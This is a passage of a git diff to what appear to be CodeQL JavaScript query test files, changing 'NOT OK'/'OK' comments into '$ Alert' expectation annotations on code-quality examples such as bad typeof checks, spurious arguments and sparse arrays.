bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..30f28719a2b7 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..a59cc7abb9e8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..3807082c7434 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js @@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK + return obj != null && obj != undefined && // $ Alert typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..c036953b01eb 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js @@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ Alert + n_ = n_ || e; // $ Alert + o_ = o_ || e; // $ Alert x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert + n && n.p; // $ Alert + o && o.p; // $ Alert x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert + n && n(); // $ Alert + o && o(); // $ Alert x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert + !n || n.p; // $ Alert + !o || o.p; // $ Alert !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert + !!n && n.p; // $ Alert + !!o && o.p; // $ Alert !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert + n != undefined && n.p; // $ Alert + o != undefined && o.p; // $ Alert x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert + n == undefined || n.p; // $ Alert + o == undefined || o.p; // $ Alert x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert + n === undefined || n.p; // $ Alert + o === undefined || o.p; // $ Alert x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert u.p; } - if (n) { // NOT OK + if (n) { // $ Alert n.p; } - if (o) { // NOT OK + if (o) { // $ Alert o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert + n? n(): _; // $ Alert + o? o(): _; // $ Alert x? x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert + if (n == undefined){} // $ Alert + if (o == undefined){} // $ Alert if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert + if (n != undefined){} // $ Alert + if (o != undefined){} // $ Alert if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert + if (typeof n === "undefined"){} // $ Alert + if (typeof o === "undefined"){} // $ Alert if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert + typeof u === "function" && u(); // $ Alert typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert + non_empty_array && non_empty_array.pop(); // $ Alert empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); @@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert + u !== undefined && u !== null && u.p; // $ Alert - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert + u == undefined || u == null; // $ Alert + u !== undefined && u !== null; // $ Alert + !(u === undefined) && !(u === null); // $ Alert + u === undefined || u === null; // $ Alert + !(u === undefined || u === null); // $ Alert + !(u === undefined) && u !== null; // $ Alert u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert } } if (typeof x !== undefined); if (typeof window !== undefined); if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -174,8 +174,8 @@ u && (f(), u.p); u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && !u.p; // $ Alert + u && !u(); // $ Alert function hasCallbacks(success, error) { diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..e10c2e0e04dd 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..f3f444fa86f7 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -42,14 +42,13 @@ function ok10(o, p) { return p in o&&o[p]; } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) +// OK - asm.js-like x = x - 1|0; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js @@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..a0fc28f09494 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; switch (typeof a) { -// OK + case 'undefined': -// NOT OK -case 'null': +case 'null': // $ Alert } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..1ffb7a489c8e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSED: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSED: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..76ffbf8c155a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js @@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..24134e1ca07c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { +function badContains(a, elt) { // $ Alert - incorrect upper bound for (let i = 0; i <= a.length; ++i) if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) @@ -53,7 +48,7 @@ function same(a, b) { return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js @@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..b440cc2dd5ed 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js @@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { // $ Alert 'i': 1, 'j': 2 } - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..19b6a3824805 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,7 +5,7 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, @@ -13,19 +13,18 @@ function A() { return _x; }, set x(v) { - // NOT OK - }, + }, // $ Alert get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} @@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..046ca3aec677 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,28 +16,26 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); @@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ 